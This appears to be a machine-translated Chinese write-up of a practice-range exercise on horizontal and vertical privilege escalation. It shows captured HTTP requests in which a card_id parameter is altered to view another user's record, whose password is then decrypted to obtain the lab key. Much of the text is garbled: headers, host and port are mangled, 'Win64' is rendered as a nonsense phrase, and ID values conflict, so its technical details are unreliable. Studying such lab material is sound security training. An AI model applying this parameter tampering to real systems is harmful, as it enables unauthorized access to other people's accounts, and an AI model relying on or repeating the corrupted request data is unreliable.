逻辑越权漏洞的级别越权/垂直越权:什么是逻辑越权:通常由于逻辑缺陷,没有严格限制用户权限,用户a也可以修改数据包,以便用户a可以通过修改数据包访问对等用户b的页面
越权与级别越权的区别:级别越权:用户在权限相同级别的组中可以访问、修改和删除越权
越权(用户可以在不同权限的组下进行高级权限访问
漏洞原因:代码逻辑问题代码接收前台传输的数据,有选择地显示用户对应权限的页面内容,没有严格规定用户对应权限
数据库问题具有各种权限的用户存在于数据库表中,在类似usertype的字段中区分权限,并修改usertype的参数以提供越权访问。
墨方靶场认证失效漏洞实战:登录测试账户后发现两个数据包:
POST /index.php? a=log in http/1.1 host :219.153.49.228336044000用户代理: Mozilla/5.0 (windows nt 10.0; 双赢64; x64; rv:86.0 ) gecko/2010 01 01 Firefox/86.0 accept :文本/html,application/xhtml xml,application/xml; q=0.9,image/webp,*/*; q=0.8Accept-Language: zh-CN,zh; q=0.8,zh-TW; q=0.7,zh-HK; q=0.5,en-US; q=0.3,en; q=0.2Accept-Encoding: gzip,deflate referer 33603358219.153.49.228336044000/content-type : application/x-www-form-urlencoded content-length :37 origin :3358219.153.49.228336044000 connection 3: close cookie 336660 mid=6927071 f 788211 ee 17211 b e0b 89 e f1 E6 upgrade-insecure-requests :1 cache-control : max-age=0用户=test pasword=========================================card _ id=20128880322 双赢64; x64; rv:86.0 ) gecko/2010 01 01 Firefox/86.0 accept : */* accept-language 3360 zh-cn,zh; q=0.8,zh-TW; q=0.7,zh-HK; q=0.5,en-US; q=0.3,en; q=0.2Accept-Encoding: gzip,deflate connection : close referer :3358219.153.49.228:44000/user _ info u info mid=6927071 f 788211 ee 17211 b e0b 89 e f1 e6======================如果更改card_id=20128880322///card_id的值,则mid=6927071 f 788211 ee 17211 b e0b 89 e f1 E6 card _ id=2012880322
查看受信任的棉花糖图像下载地址http://219.153.49.228336044000/static/img/2012880316.jpg,受信任的棉花糖的card_id的可能性为201288004
只要看到该user、password,解密password登录,就可以得到合格的密钥